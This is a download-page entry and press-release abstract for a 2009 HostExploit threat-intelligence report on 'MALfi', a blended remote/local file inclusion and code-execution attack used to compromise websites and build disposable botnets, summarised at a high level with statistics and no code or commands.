MALfi - A CyberCrime International Report
Please register or login to download files from this category.
|License||Creative Commons by-nc-nd|
|Changed at||2009-11-11 07:00:00|
CyberCrime International – MALfi
A new cybercrime report from HostExploit.com, the producers of the definitive reports exposing RBN (Russian Business Network), Atrivo, McColo, Real Host, and a foremost source of rogue network activity analysis on the Internet.
MALfi “A Silent Threat”
What is it all about, MALfi? A blended threat currently detected on around 350,000 websites & Internet servers. One major purpose is to establish, “use once and throw away” disposable botnets for spam, phishing, DDoS and exploits.
Abstract / Press Release
MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack utilized by hackers and cyber criminals to compromise websites and servers. This is a combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack), and RCE (remote code execution).
Conservative estimates over recent months indicate around 350,000 affected websites and servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks, involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs involved.
RFI is used by hackers to compromise websites and upload a remote user interface shell. This ensures partial to full manual and unauthorized control over the server. This differs from the now familiar “drive by” web site exploit as it provides hackers with a ready-made arena where internet plunder in the form of information, controlled servers and web sites are exchanged or resold to cyber criminal groups.
Essentially the RFI hackers continuously and automatically search for website vulnerabilities for exploitation. Once breached, the websites and often the now compromised underlying servers, are utilized for DDoS (distributed denial of service) attacks such as the recent US and Korean government DDoS, spamming, phishing, large scale ID theft and to facilitate further attacks on other targets. It follows that many of the regular and apparently attempted attacks on various high volume governmental and key servers were RFI and similar vulnerability scanning, bots and scripts.
In comparing RFI and SQL injection / viruses / worms, RFI scanning, and related exploitation, happens continuously and affects all corners of the Internet. Both un-patched windows systems and systems with RFI vulnerabilities are on a theoretical time to live.
The how, what and where of this particular hacking technique and cybercrime business model are provided together with detailed and graphic explanations in the HostExploit community research report.